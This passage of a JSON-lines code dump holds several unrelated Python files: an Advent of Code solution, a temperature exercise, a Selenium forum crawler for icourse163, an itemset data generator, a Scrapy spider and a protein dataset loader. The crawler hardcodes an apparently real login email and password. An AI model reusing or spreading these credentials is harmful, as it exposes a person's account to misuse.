sea_monster_match.append(re.compile(\"(?=(\" + sea_monster[1].replace(\" \", \".\") + \"))\"))\n sea_monster_match.append(re.compile(\"(?=(\" + sea_monster[2].replace(\" \", \".\") + \"))\"))\n\n sea_monster_count = 0\n for row in range(len(grid) - len(sea_monster_match) + 1):\n matches = []\n for pattern_index in range(len(sea_monster_match)):\n inner_matches = []\n for m in sea_monster_match[pattern_index].findall(grid[row + pattern_index]):\n inner_matches.append(grid[row + pattern_index].index(m))\n matches.append(inner_matches)\n for match_index in matches[1]:\n if match_index in matches[0] and match_index in matches[2]:\n sea_monster_count += 1\n for monster_index, monster_row in enumerate(sea_monster):\n for monster_char_index, monster_char in enumerate(monster_row):\n if monster_char == \"#\":\n grid[row + monster_index] = grid[row + monster_index][: match_index + monster_char_index] + \"O\" + grid[row + monster_index][match_index + monster_char_index + 1 :]\n roughness = sum([row.count(\"#\") for row in grid])\n\n return sea_monster_count != 0, roughness\n\ndef print_grid(grid):\n colorama.init()\n for row in grid:\n for char in row:\n if char == \"#\":\n print(colorama.Fore.BLUE, end='')\n elif char == \".\":\n print(colorama.Fore.CYAN, end='')\n elif char == \"O\":\n print(colorama.Fore.YELLOW, end='')\n else:\n assert False\n print(char + colorama.Style.RESET_ALL, end='')\n print()\n\naoc.run_raw(main, \"day20.txt\")","repo_name":"Fungu/advent_of_code","sub_path":"aoc_2020_python/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74271856365","text":"from io import open\n#ejercio leer el fichero de temperaturas, y sacar la media de cada mes \n#escrbir las temp media en un fichero..avgtemps.txt\n\n\nlist_media=[]\ndias = 0\nsuma =0\n##Lectura del fichero temperaturas\nwith open(\"temperatures.txt\",\"r\") as f: \n for line in f:\n arrTemp = [int (line) for line in line.strip().split(',')]\n suma =sum(arrTemp)\n list_media.append(suma / len(arrTemp))\nwith open(\"avgtemps.txt\",\"w\") as f: \n for media in list_media:\n f.write(str(media)+\"\\n\")\nprint(\"Se ha creado el fichero avgtemps.txt\")","repo_name":"kvnguevara/python","sub_path":"ficheros/mediaTemperatura.py","file_name":"mediaTemperatura.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"8270827801","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport json\nimport datetime\nimport uuid\nimport logging\nimport settings\nimport selenium.webdriver\nimport selenium.webdriver.remote.webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom utils import parse_time\n\nkTargetUrl = 'https://www.icourse163.org/learn/HIT-1001515007'\nkRootUrl = 'https://www.icourse163.org/'\nkLoginUrl = 'https://www.icourse163.org/passport/sns/doOAuth.htm?snsType=6&oauthType=login&returnUrl=aHR0cHM6Ly93d3cuaWNvdXJzZTE2My5vcmcvaW5kZXguaHRtP2Zyb209c3R1ZHk='\n\n\nclass ForumFetcher:\n def run(self) -> dict:\n res = dict()\n res['forum_post_info'] = self.get_forum_info()\n return res\n\n def time_utils(self, type: int, time_str: str):\n time_str1 = ''\n if type == 1:\n time_str1 = time_str[1:5] + '-' + time_str[6:8] + '-' + time_str[9:11]\n return datetime.datetime.strptime(time_str1, '%Y-%m-%d')\n elif type == 2:\n if len(time_str.split(\"-\")) > 1:\n return datetime.datetime.strptime(time_str, '%Y-%m-%d')\n if len(time_str.split(\":\")) > 1:\n hour = int(time_str.split(\":\")[0])\n minute = int(time_str.split(\":\")[1])\n return datetime.datetime.now().replace(hour=hour, minute=minute)\n if time_str.find(\"分钟\") >= 0:\n minute = datetime.datetime.now().minute\n minute_diff = minute - int(time_str[0:time_str.find(\"分钟\")])\n if minute_diff > 0:\n return datetime.datetime.now().replace(minute=minute_diff)\n else:\n return datetime.datetime.now().replace(minute=0)\n month_index = time_str.find(\"月\")\n month = int(time_str[0:month_index])\n day = int(time_str[month_index+1:-1])\n return datetime.datetime.now().replace(month=month,day=day)\n\n def get_forum_info(self) -> list:\n res = list()\n self.__driver.get(\"http://www.icourse163.org/course/LZU-152001\")\n '''\n try:\n WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"div.course-enroll-info_course-info_term-info_term-progress.unstarted\")\n )\n except selenium.common.exceptions.TimeoutException:\n print(\"未开课\")\n return res\n '''\n try:\n # TODO 貌似Headless模式被反爬了,这个地方headless加载不上\n main_page = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"span.ux-btn.ux-btn-.ux-btn-w220\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n if '老师已关闭该学期,无法查看' == main_page.text.strip():\n return res\n main_page.click()\n time.sleep(10)\n try:\n notice = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_partial_link_text(\"公告\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n notice.click()\n time.sleep(1)\n\n try:\n discuss = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_partial_link_text(\"讨论区\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n discuss.click()\n time.sleep(2)\n #self.__driver.get(\"https://www.icourse163.org/learn/SWJTU-1001908004?tid=1207120209#/learn/forumindex\")\n while True:\n try:\n discuss_div = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"div.u-forumlistwrap.j-alltopiclist\").find_element_by_css_selector(\"div.m-data-lists.f-cb.f-pr.j-data-list\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n lis = discuss_div.find_elements_by_tag_name(\"li\")\n for i in range(len(lis)):\n main_post = dict()\n try:\n discuss_div = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"div.u-forumlistwrap.j-alltopiclist\").find_element_by_css_selector(\"div.m-data-lists.f-cb.f-pr.j-data-list\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n li = discuss_div.find_elements_by_tag_name(\"li\")[i]\n userinfo = li.find_elements_by_css_selector(\"span.userInfo.j-userInfo\")[0]\n try:\n userinfo.find_element_by_css_selector(\"span.type.lector\")\n main_post['forum_post_userrole'] = 1\n except selenium.common.exceptions.NoSuchElementException:\n main_post['forum_post_userrole'] = 2\n try:\n name_a = userinfo.find_element_by_tag_name(\"a\")\n main_post['forum_post_username'] = name_a.get_attribute('title').strip()\n except selenium.common.exceptions.NoSuchElementException:\n main_post['forum_post_username'] = '匿名发表'\n main_post['forum_post_userrole'] = 0\n reply_time = li.find_elements_by_css_selector(\"span.lb10.f-fc9\")[0]\n main_post['forum_post_time'] = self.time_utils(1, reply_time.text.strip())\n discuss_a = li.find_element_by_css_selector(\"a.f-fc3.f-f0.lb10.j-link\")\n discuss_a.click()\n time.sleep(2)\n try:\n WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_class_name('j-post')\n )\n except selenium.common.exceptions.TimeoutException:\n logging.error('[ForumFetcher.get_forum_detail] Cannot load post div')\n\n main_post['forum_post_id'] = str(uuid.uuid1())\n main_post['forum_id'] = ''\n main_post['forum_name'] = self.__driver.find_element_by_xpath(\n '//*[@id=\"courseLearn-inner-box\"]/div/div[1]/div/a[2]').text\n div_main = self.__driver.find_element_by_class_name('j-post')\n main_post['forum_subject'] = div_main.find_element_by_class_name('j-title').text\n main_post['forum_post_content'] = div_main.find_element_by_class_name('j-content').text\n main_post['forum_post_type'] = 1\n main_post['forum_reply_id'] = '0'\n main_post['forum_reply_userid'] = ''\n main_post['update_time'] = datetime.datetime.now()\n print(main_post)\n res.append(main_post)\n try:\n div_reply_list = self.__driver.find_elements_by_xpath(\"//*[@id='courseLearn-inner-box']/div/div[2]/div/div[4]/div/div[1]/div[1]/div\")\n except selenium.common.exceptions.NoSuchElementException:\n continue\n # TODO 二级回复/多页回复未处理\n for div_reply_all in div_reply_list:\n div_reply = div_reply_all.find_element_by_class_name(\"m-detailInfoItem\")\n reply_content = div_reply.find_element_by_class_name('j-content').text\n post_reply['forum_post_userrole'] = 4\n try:\n reply_user = div_reply.find_element_by_class_name('userInfo').find_element_by_tag_name('a').text\n except selenium.common.exceptions.NoSuchElementException:\n reply_user = div_reply.find_element_by_class_name('anonyInfo').text\n post_reply['forum_post_userrole'] = 0\n try:\n div_reply.find_element_by_class_name('userInfo').find_element_by_css_selector(\"span.type.lector\")\n reply_is_teacher = True\n except selenium.common.exceptions.NoSuchElementException:\n reply_is_teacher = False\n reply_time = div_reply.find_element_by_class_name('j-time').text\n\n post_reply = dict()\n post_reply['forum_post_id'] = str(uuid.uuid1())\n post_reply['forum_id'] = ''\n post_reply['forum_name'] = main_post['forum_name']\n post_reply['forum_subject'] = main_post.get(\"forum_subject\")\n post_reply['forum_post_type'] = 2\n post_reply['forum_reply_id'] = main_post['forum_post_id']\n post_reply['forum_reply_userid'] = ''\n post_reply['forum_post_username'] = reply_user\n # TODO User role type should be a enum val\n if post_reply.get(\"forum_post_userrole\") != 0:\n post_reply['forum_post_userrole'] = 1 if reply_is_teacher else 2\n post_reply['forum_post_content'] = reply_content\n post_reply['forum_post_time'] = self.time_utils(2, reply_time)\n post_reply['update_time'] = datetime.datetime.now()\n res.append(post_reply)\n print(post_reply)\n comment_a = div_reply.find_element_by_css_selector(\"a.f-fr.f-fc9.opt.cmtBtn.j-cmtBtn\")\n if comment_a.text.strip()[3:-1] != '0':\n\n #self.__driver.execute_script(\"arguments[0].scrollIntoView();\", comment_a)\n comment_a.click()\n\n #self.__driver.execute_script(\"$(arguments[0]).click()\", comment_a)\n time.sleep(2)\n try:\n div_reply2 = div_reply_all.find_element_by_class_name(\"m-commentWrapper\")\n except selenium.common.exceptions.NoSuchElementException:\n continue\n m_data_lists = div_reply2.find_element_by_class_name(\"m-data-lists\")\n m_divs = m_data_lists.find_elements_by_class_name(\"m-detailInfoItem\")\n for j in range(len(m_divs)):\n post_reply1 = dict()\n post_reply1['forum_post_id'] = str(uuid.uuid1())\n post_reply1['forum_id'] = ''\n post_reply1['forum_name'] = main_post['forum_name']\n post_reply1['forum_subject'] = main_post.get(\"forum_subject\")\n post_reply1['forum_post_type'] = 2\n post_reply1['forum_reply_id'] = post_reply1['forum_post_id']\n post_reply1['forum_reply_userid'] = ''\n # TODO User role type should be a enum val\n post_reply1['forum_post_userrole'] = 4\n m_div = m_data_lists.find_elements_by_class_name(\"m-detailInfoItem\")[j]\n try:\n m_div.find_element_by_css_selector(\"span.type.lector\")\n post_reply1['forum_post_userrole'] = 1\n except selenium.common.exceptions.NoSuchElementException:\n post_reply1['forum_post_userrole'] = 2\n try:\n m_div.find_element_by_css_selector(\"a.f-fcgreen\")\n except selenium.common.exceptions.NoSuchElementException:\n post_reply1['forum_post_userrole'] = 0\n\n reply_content = m_div.find_element_by_class_name(\"f-richEditorText\").text.strip()\n if post_reply1.get(\"forum_post_userrole\") == 0:\n reply_user = '匿名发表'\n else:\n reply_user = m_div.find_element_by_css_selector(\"a.f-fcgreen\").get_attribute(\"title\")\n reply_time = m_div.find_element_by_css_selector(\"div.f-fl.f-fc9.time.j-time\").text.strip()\n post_reply1['forum_post_username'] = reply_user\n post_reply1['forum_post_content'] = reply_content\n post_reply1['forum_post_time'] = self.time_utils(2, reply_time)\n post_reply1['update_time'] = datetime.datetime.now()\n print(post_reply1)\n res.append(post_reply1)\n self.__driver.back()\n time.sleep(2)\n try:\n next_page = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_partial_link_text(\"下一页\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n if next_page.get_attribute('class') == 'zbtn znxt js-disabled':\n break\n else:\n next_page.click()\n time.sleep(2)\n print(len(res))\n return res\n\n def __init__(self,\n driver: selenium.webdriver.remote.webdriver.WebDriver, wait_time=10):\n self.__driver = driver\n self.__kWaitSecond = wait_time\n\n\ndef main():\n print(datetime.datetime.now())\n start_time = datetime.datetime.now().timestamp()\n options = selenium.webdriver.ChromeOptions()\n browser = selenium.webdriver.Chrome(options=options)\n browser.get('https://www.icourse163.org/')\n login = browser.find_element_by_partial_link_text(\"登录\")\n login.click()\n ux_login = browser.find_element_by_class_name(\"ux-login-set-login-set-panel\")\n email_login = ux_login.find_elements_by_tag_name(\"li\")[1]\n email_login.click()\n time.sleep(2)\n j_urs_container = ux_login.find_element_by_id(\"j-ursContainer-0\")\n iframe1 = WebDriverWait(j_urs_container, 5).until(\n lambda x: x.find_element_by_tag_name(\"iframe\"))\n browser.switch_to.frame(iframe1)\n login_form = browser.find_element_by_id(\"login-form\")\n username = login_form.find_elements_by_class_name(\"inputbox\")[0].find_elements_by_tag_name(\"input\")[0]\n username.send_keys(\"ghliang88@163.com\")\n password = login_form.find_elements_by_class_name(\"inputbox\")[1].find_elements_by_tag_name(\"input\")[1]\n password.send_keys(\"G1&h2&l3\")\n login1 = login_form.find_element_by_partial_link_text(\"登录\")\n login1.click()\n time.sleep(2)\n course = browser.find_elements_by_class_name(\"m-slideTop-cateFunc-f\")[0]\n course.click()\n time.sleep(5)\n windows = browser.window_handles\n browser.switch_to_window(windows[-1])\n\n courses = browser.find_element_by_xpath(\"//*[@id='app']/div/div/div[2]/div[1]/div[2]/div/div/div/ul/div[1]\")\n time.sleep(2)\n courses.click()\n windows = browser.window_handles\n browser.switch_to_window(windows[-1])\n forum = ForumFetcher(browser)\n print(forum.run())\n print(datetime.datetime.now())\n end_time = datetime.datetime.now().timestamp()\n print((end_time - start_time) / 60.0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"haowenmvp/mooc_crawler","sub_path":"tests/icourse163/icourse163.py","file_name":"icourse163.py","file_ext":"py","file_size_in_byte":15299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71378885168","text":"from os import stat\nfrom typing import Iterable, List, Dict, Optional, Tuple\nfrom itertools import combinations\nimport random\nimport json\nfrom numpy.random.mtrand import random_sample\nimport pandas as pd\n\n\nclass FrequentItemsetGenerator(object):\n\n def __init__(\n self, \n items: Optional[Iterable]=None,\n frequency_range: Tuple[float, float] = (0.1, 0.2),\n union_limits: Tuple[float, float] = (0.2, 0.3),\n isolated_frequency_limit: float = 0.1\n ) -> None:\n \"\"\"初始化生成器\n\n :param items: 生成数据的元素集合, defaults to None, 缺省会使用[0, 1, 2... 99]代替。\n :type items: Optional[Iterable], optional\n :param frequency_range: 频繁项集概率分布范围, defaults to (0.1, 0.2)\n :type frequency_range: Tuple[float, float], optional\n :param union_limits: 频繁项并集概率分布限制范围, defaults to (0.2, 0.3)\n :type union_limits: Tuple[float, float], optional\n :param isolated_frequency_limit: 独立项概率分布限制, defaults to 0.1\n :type isolated_frequency_limit: float, optional\n\n 在默认情况下,初始化的元素为:\n \n >>> items = {0, 1, 2, ... 99}\n\n frequency_range = (0.1, 0.2), 即\n\n >>> 0.1 < P({0, 1, 2}) < 0.2\n\n union_limits=(0.2, 0.3), 即\n\n >>> 0.2 < P({0, 1, 2} | {0, 1} | {0, 2} | {1, 2} | {0} | {1} | {2}) < 0.3\n\n isolated_frequency_limit=0.1 即\n\n >>> P({99}) < 0.1\n \n 这里 {99} 为独立的一项\n \"\"\"\n self.items = list(items) if isinstance(items, Iterable) else list(range(100))\n self.frequency_range = frequency_range\n self.union_limits = union_limits\n self.isolated_frequency_limit = isolated_frequency_limit\n \n def proportion_batches(self, itemset_sizes: Iterable) -> list:\n items = self.items.copy()\n random.shuffle(items)\n index = 0\n batches = []\n for itemset_counts in itemset_sizes:\n itemsets = items[index:index+itemset_counts]\n batch = self.itemsets_frequency(itemsets)\n batches.append(list(batch))\n index += itemset_counts\n\n for item in items[index:]:\n prop = self.random_range(0, self.isolated_frequency_limit)\n batches.append([((item,), prop)])\n \n return batches\n\n @staticmethod\n def batch2dict(batches: list) -> dict:\n dct = {}\n for batch in batches:\n for key, value in batch:\n dct[key] = value\n return dct\n \n @staticmethod\n def batch2json(batches: list) -> list:\n result = []\n for batch in batches:\n for key, value in batch:\n result.append({\n \"itemset\": list(key),\n \"proportion\": value\n })\n return json.dumps(result)\n \n @staticmethod\n def batch2df(batches: list) -> pd.DataFrame:\n result = []\n for index, batch in enumerate(batches):\n for key, value in batch:\n result.append({\n \"itemset\": list(key),\n \"support\": value,\n \"batch\": index\n })\n return pd.DataFrame(result)\n \n @staticmethod\n def df2batch(batches: pd.DataFrame) -> list:\n result = []\n for _id, df in batches.groupby(\"batch\"):\n result.append(\n [(tuple(doc[\"itemset\"]), doc[\"proportion\"]) for doc in df.to_dict(\"record\")]\n )\n return result\n\n\n @staticmethod\n def write_batch_parquet(filename: str, batches: pd.DataFrame):\n from pyarrow import parquet as pq\n from pyarrow import Table\n\n table = Table.from_pandas(batches)\n pq.write_table(table, filename)\n \n @staticmethod\n def read_batch_parquet(filename: str) -> pd.DataFrame:\n from pyarrow import parquet as pq\n return pq.read_table(filename).to_pandas()\n\n def generate_from_batch(self, batches: list, samples: int):\n data = [list() for i in range(samples)]\n for batch in batches:\n itemset_counts = [(itemset, int(prop*samples)) for itemset, prop in batch]\n total_counts = sum([item[1] for item in itemset_counts])\n sample_itemsets = random.sample(data, total_counts)\n index = 0\n for itemset, count in itemset_counts:\n for sample in sample_itemsets[index:index+count]:\n sample.extend(itemset)\n index += count\n return data\n\n def generate(self, itemset_sizes: Iterable=(3,)*5, samples: int=100000) -> Tuple[List, Dict]:\n batches = self.proportion_batches(itemset_sizes)\n data = self.generate_from_batch(batches, samples)\n return data, self.batch2dict(batches)\n\n def generate_df(self, itemset_sizes: Iterable=(3,)*5, samples: int = 100000):\n \"\"\"生成样本数据,同generate\n\n :return: (data, proportion)\n samples: 生成的数据样本\n proportion: 数据样本中各项的比例 \n :rtype: Tuple[pandas.DataFrame, Dict]\n \"\"\"\n data, proportions = self.generate(itemset_sizes, samples)\n return pd.DataFrame({\"itemsets\": data}), proportions\n\n @staticmethod\n def gen_empty_list(size: int):\n for i in range(size):\n yield list()\n \n @staticmethod\n def random_range(start: float, end: float) -> float:\n return start + (end-start) * random.random()\n\n @staticmethod\n def random_sequence(start: float, end: float, size: int):\n block_size = (end-start)/size\n return [FrequentItemsetGenerator.random_range(start+i*block_size, start+(i+1)*block_size) for i in range(size)]\n\n def itemsets_frequency(self, itemsets: List):\n combs = []\n for size in reversed(range(1, len(itemsets)+1)):\n for comb in combinations(itemsets, size):\n combs.append(comb)\n sup = self.random_range(self.frequency_range[0], self.frequency_range[1])\n limit = self.random_range(self.union_limits[0], self.union_limits[1])\n acc_frequency = self.random_sequence(sup, limit, len(combs))\n frequency = acc_frequency.copy()\n for i, f in enumerate(map(lambda a,b: a-b, acc_frequency[1:],acc_frequency[:-1])):\n frequency[i+1] = f\n\n return zip(combs, frequency)\n","repo_name":"cheatm/sparkbdgen","sub_path":"sparkbdgen/associations/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":6445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"32863052586","text":"# pylint: disable=R0201,missing-docstring\n__author__ = 'Shaharyar Ahmad'\nfrom scrapy import Spider, Request\nfrom House_Committee_Oversight.items import HCOItem\nfrom House_Committee_Oversight.pipelines import process_string\n\nclass MainSpider(Spider):\n name = \"MainSpider\"\n start_urls = [\"http://oversight.house.gov/hearings/\"]\n \n def parse(self, response):\n\n rows = response.selector.xpath(\n '//*[@id=\"bodyContent\"]/div[1]/div[1]/div')\n for rows in rows:\n item = HCOItem()\n\n item['url'] = rows.xpath('div/h3/a/@href').extract()\n item['title'] = process_string(\n rows.xpath('div/h3/a/text()').extract()[0])\n item['Subcommittee'] = rows.xpath(\n 'div[1]/div[1]/a/text()').extract()\n if item['Subcommittee'] == []:\n item['Subcommittee'] = \"[Not Mentioned]\"\n time_date = rows.xpath('div[1]/div[2]/text()').extract()\n item['publishdate'] = time_date[0].split('|')[0]\n item['publishtime'] = time_date[0].split('|')[1].split('m')[0] + \"m.\"\n if item['publishtime'] == \"m.\":\n item['publishtime'] = \"Not Mentioned\"\n item[\n 'Source'] = \"House Committee on Oversight and Government Reform\"\n item['_type'] = \"Hearings\"\n item['ekwhere'] = \"Fed\"\n yield item\n\n def start_requests(self):\n for count in range(1, 91):\n yield Request(\"%spage/%d/\" % (self.start_urls[0], count), self.parse)\n \n","repo_name":"shaharyarrrr/scrapy","sub_path":"Spiders/House_Committee_Oversight/House_Committee_Oversight/spiders/MainSpider.py","file_name":"MainSpider.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"24391578156","text":"import json\nimport logging\nimport math\nfrom pathlib import Path\nfrom typing import Dict\n\nimport torch\nfrom Bio import SeqIO\nfrom Bio.PDB import PDBParser\nfrom Bio.SeqUtils import seq1\nfrom torch.nn import functional as F\nfrom torch.utils.data import Dataset\n\nLOG = logging.getLogger(__name__)\n\nAMINO_TO_NUM = {\n \"A\": 0, # Alanine\n \"C\": 1, # Cysteine\n \"D\": 2, # Aspartic Acid\n \"E\": 3, # Glutamic Acid\n \"F\": 4, # Phenylalanine\n \"G\": 5, # Glycine\n \"H\": 6, # Histidine\n \"I\": 7, # Isoleucine\n \"K\": 8, # Lysine\n \"L\": 9, # Leucine\n \"M\": 10, # Methionine\n \"N\": 11, # Asparagine\n \"P\": 12, # Proline\n \"Q\": 13, # Glutamine\n \"R\": 14, # Arginine\n \"S\": 15, # Serine\n \"T\": 16, # Threonine\n \"V\": 17, # Valine\n \"W\": 18, # Tryptophan\n \"Y\": 19, # Tyrosine\n \"U\": 20, # Selenocysteine\n}\n\n\nclass H3Dataset(Dataset):\n def __init__(self, dataset_dir: Path) -> None:\n super().__init__()\n\n self._pdb_file_list = list(\n dataset_dir.joinpath(\"pdb\", \"truncated\").glob(\"*.pdb\")\n )\n self._fasta_dir = dataset_dir.joinpath(\"fasta\")\n self._fasta_dir.mkdir(parents=True, exist_ok=True)\n\n @staticmethod\n def convert_pdb_to_fasta(pdb: Path, fasta: Path) -> None:\n pdb_id = pdb.stem\n parser = PDBParser()\n structure = parser.get_structure(pdb_id, pdb)\n\n fasta_str = \"\"\n for chain in structure.get_chains():\n seq = seq1(\"\".join([residue.resname for residue in chain]))\n description = {\"id\": pdb_id, \"chain\": chain.id, \"length\": len(seq)}\n fasta_str += f\">{json.dumps(description)}\\n\"\n for i in range(0, len(seq), 80):\n fasta_str += f\"{seq[i:i + 80]}\\n\"\n\n with fasta.open(\"w\") as fd:\n fd.write(fasta_str)\n\n @staticmethod\n def get_sequences(fasta: Path) -> Dict[str, str]:\n sequences = {}\n for record in SeqIO.parse(fasta, \"fasta\"):\n # pylint: disable=bare-except\n try:\n description = json.loads(record.description)\n chain_id = description[\"chain\"]\n except:\n LOG.warning(\"description is not json format in %s\", fasta)\n chain_id = record.description[:2]\n\n sequences[chain_id] = record.seq.upper()\n return sequences\n\n @staticmethod\n def _generate_dist_matrix(\n coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n coords = coords.unsqueeze(0)\n dist_mat_shape = (coords.shape[1], coords.shape[1], coords.shape[2])\n row_expand = coords.transpose(0, 1).expand(dist_mat_shape)\n col_expand = coords.expand(dist_mat_shape)\n dist_mat = (row_expand - col_expand).norm(dim=2)\n\n n = len(mask)\n not_mask = torch.ones(n).type(dtype=mask.dtype) - mask\n not_mask = (\n not_mask.unsqueeze(0).transpose(0, 1).expand(n, n).add(not_mask)\n )\n dist_mat[not_mask > 0] = mask_fill_value\n\n return dist_mat\n\n @staticmethod\n def _generate_cb_cb_dihedral(\n ca_coords: torch.Tensor,\n cb_coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n mat_shape = (ca_coords.shape[0], ca_coords.shape[0], ca_coords.shape[1])\n\n b1 = (cb_coords - ca_coords).expand(mat_shape)\n b2 = cb_coords.expand(mat_shape)\n b2 = b2.transpose(0, 1) - b2\n b3 = -1 * b1.transpose(0, 1)\n\n n1 = torch.cross(b1, b2)\n n1 /= n1.norm(dim=2, keepdim=True)\n n2 = torch.cross(b2, b3)\n n2 /= n2.norm(dim=2, keepdim=True)\n m1 = torch.cross(b2 / b2.norm(dim=2, keepdim=True), n1)\n\n dihedral_mat = torch.atan2((m1 * n2).sum(-1), (n1 * n2).sum(-1))\n dihedral_mat *= 180 / math.pi\n\n mask = mask.expand((len(mask), len(mask)))\n mask = mask & mask.transpose(0, 1)\n dihedral_mat[mask == 0] = mask_fill_value\n\n return dihedral_mat\n\n @staticmethod\n def _generate_ca_cb_dihedral(\n ca_coords: torch.Tensor,\n cb_coords: torch.Tensor,\n n_coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n mat_shape = (ca_coords.shape[0], ca_coords.shape[0], ca_coords.shape[1])\n\n b1 = (ca_coords - n_coords).expand(mat_shape)\n b2 = (cb_coords - ca_coords).expand(mat_shape)\n b3 = cb_coords.expand(mat_shape)\n b3 = b3.transpose(0, 1) - b3\n\n n1 = torch.cross(b1, b2)\n n1 /= n1.norm(dim=2, keepdim=True)\n n2 = torch.cross(b2, b3)\n n2 /= n2.norm(dim=2, keepdim=True)\n m1 = torch.cross(b2 / b2.norm(dim=2, keepdim=True), n1)\n\n dihedral_mat = torch.atan2(\n (m1 * n2).sum(-1), (n1 * n2).sum(-1)\n ).transpose(0, 1)\n dihedral_mat *= 180 / math.pi\n\n mask = mask.expand((len(mask), len(mask)))\n mask = mask & mask.transpose(0, 1)\n dihedral_mat[mask == 0] = mask_fill_value\n\n return dihedral_mat\n\n @staticmethod\n def _generate_ca_cb_cb_planar(\n ca_coords: torch.Tensor,\n cb_coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n mat_shape = (ca_coords.shape[0], ca_coords.shape[0], ca_coords.shape[1])\n\n v1 = (ca_coords - cb_coords).expand(mat_shape)\n v2 = cb_coords.expand(mat_shape)\n v2 = v2.transpose(0, 1) - v2\n\n planar_mat = (v1 * v2).sum(-1) / (v1.norm(dim=2) * v2.norm(dim=2))\n planar_mat = torch.acos(planar_mat).transpose(0, 1)\n planar_mat *= 180 / math.pi\n\n mask = mask.expand((len(mask), len(mask)))\n mask = mask & mask.transpose(0, 1)\n planar_mat[mask == 0] = mask_fill_value\n\n return planar_mat\n\n @classmethod\n def get_label_from_pdb(cls, pdb: Path):\n parser = PDBParser()\n structure = parser.get_structure(pdb.stem, pdb)\n residues = list(structure.get_residues())\n\n def get_cb_or_ca_coord(residue):\n if \"CB\" in residue:\n return residue[\"CB\"].get_coord()\n\n if \"CA\" in residue:\n return residue[\"CA\"].get_coord()\n\n return [0, 0, 0]\n\n def get_atom_coord(residue, atom_type):\n if atom_type in residue:\n return residue[atom_type].get_coord()\n return [0, 0, 0]\n\n cb_ca_coords = torch.tensor([get_cb_or_ca_coord(r) for r in residues])\n ca_coords = torch.tensor([get_atom_coord(r, \"CA\") for r in residues])\n cb_coords = torch.tensor([get_atom_coord(r, \"CB\") for r in residues])\n n_coords = torch.tensor([get_atom_coord(r, \"N\") for r in residues])\n\n cb_mask = torch.ByteTensor([1 if sum(_) != 0 else 0 for _ in cb_coords])\n mask = torch.ByteTensor([1] * len(cb_coords))\n\n output_matrix = torch.stack(\n [\n cls._generate_dist_matrix(cb_ca_coords, mask=mask),\n cls._generate_cb_cb_dihedral(\n ca_coords, cb_coords, mask=(mask & cb_mask)\n ),\n cls._generate_ca_cb_dihedral(\n ca_coords, cb_coords, n_coords, mask=(mask & cb_mask)\n ),\n cls._generate_ca_cb_cb_planar(\n ca_coords, cb_coords, mask=(mask & cb_mask)\n ),\n ]\n ).type(torch.float)\n\n return output_matrix\n\n @staticmethod\n def get_h3_cdr_indices(pdb: Path):\n parser = PDBParser()\n structure = parser.get_structure(pdb.stem, pdb)\n chain = structure[0][\"H\"]\n min_i = 200\n max_i = 0\n for i, res in enumerate(chain):\n if 95 <= res.id[1] <= 102:\n if i < min_i:\n min_i = i\n if i > max_i:\n max_i = i\n\n return torch.Tensor([min_i, max_i]).type(torch.int)\n\n @staticmethod\n def get_dist_bins(num_bins):\n first_bin = 4\n bins = [\n (first_bin + 0.5 * i, first_bin + 0.5 + 0.5 * i)\n for i in range(num_bins - 2)\n ]\n bins.append((bins[-1][1], float(\"Inf\")))\n bins.insert(0, (0, first_bin))\n return bins\n\n @staticmethod\n def get_omega_bins(num_bins):\n first_bin = -180\n bin_width = 2 * 180 / num_bins\n bins = [\n (first_bin + bin_width * i, first_bin + bin_width * (i + 1))\n for i in range(num_bins)\n ]\n return bins\n\n @staticmethod\n def get_theta_bins(num_bins):\n first_bin = -180\n bin_width = 2 * 180 / num_bins\n bins = [\n (first_bin + bin_width * i, first_bin + bin_width * (i + 1))\n for i in range(num_bins)\n ]\n return bins\n\n @staticmethod\n def get_phi_bins(num_bins):\n first_bin = 0\n bin_width = 180 / num_bins\n bins = [\n (first_bin + bin_width * i, first_bin + bin_width * (i + 1))\n for i in range(num_bins)\n ]\n return bins\n\n @staticmethod\n def get_bin_values(bins):\n bin_values = [t[0] for t in bins]\n bin_width = (bin_values[2] - bin_values[1]) / 2\n bin_values = [v + bin_width for v in bin_values]\n bin_values[0] = bin_values[1] - 2 * bin_width\n return bin_values\n\n @classmethod\n def bin_dist_angle_matrix(cls, dist_angle_mat, num_bins=26):\n dist_bins = cls.get_dist_bins(num_bins)\n omega_bins = cls.get_omega_bins(num_bins)\n theta_bins = cls.get_theta_bins(num_bins)\n phi_bins = 